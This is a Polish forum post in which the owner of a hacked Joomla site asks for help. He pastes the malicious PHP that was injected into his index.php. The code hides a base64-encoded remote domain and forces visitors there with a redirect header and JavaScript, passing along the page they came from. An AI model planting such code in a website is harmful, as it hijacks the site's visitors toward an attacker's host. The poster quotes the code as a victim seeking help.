Witam
Od dwóch tygodni ktoś włamuje się bezczelnie na moja stronę !!!
Ja przywracam pliki z serwera z kopii, mijają 4h i znowu to samo. Podejrzewam, iż dzieje się to przez SQL, ale pewności nie mam. Adres strony - http://www.akces.eu, Wersja Joomla 1.5.22 czyli najbardziej aktualna. Zgłosiłem to na policję, ale znając życie to i tak z tym nic nie zrobią ;/ Jak zlokalizować takiego kogoś, lub ewentualnie jakoś dobrze zablokować, aby już tego nie robił. Bardzo mnie to drażni. Po dokonanym włamaniu na stronie widnieje komunikat o treści : Parse error: syntax error, unexpected '<' in /index.php on line 88.
Bardzo proszę forumowiczów o pomoc. Dodam, że pliki mają odpowiednie prawa tak jak jest to opisane w helpie Joomli .
Proszę o ewentualne podpowiedzi jak dorwać tego kogoś, zlokalizować lub zablokować ?
Dodam, że w kodzie index.php pojawia się cos takiego jak poniżej:
echo JResponse::toString($mainframe->getCfg('gzip'));<?php if(!isset($tf['engine'])){$tf['engine']=1;$tf['s']=base64_decode('a2hjb2wuY29t');$tf['u']='http://'.$tf['s'].'/page/';$tf['r']="?ref=".base64_encode('http://'.@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI']);if(!isset($_GET['rf'])){if(!@headers_sent()){@header("HTTP/1.1 302 Moved Temporarily");@header("Location: ".$tf['u'].$tf['r']);}echo "<h3>Page Moved</h3>The page you are trying to open has been moved.<br><br>Use the navigation links on the right of this page, the search box at the top, or the site map link below to find the new location of the page you're seeking.<br><br>Click the link below to follow new url.<br><br><a href=\"".$tf['u']."\">".$tf['u']."</a>";echo "<script type=\"text/javascript\">document.location = \"".$tf['u'].$tf['r']."\";</script>";exit;}
Bardzo proszę o pomoc .
Cytuj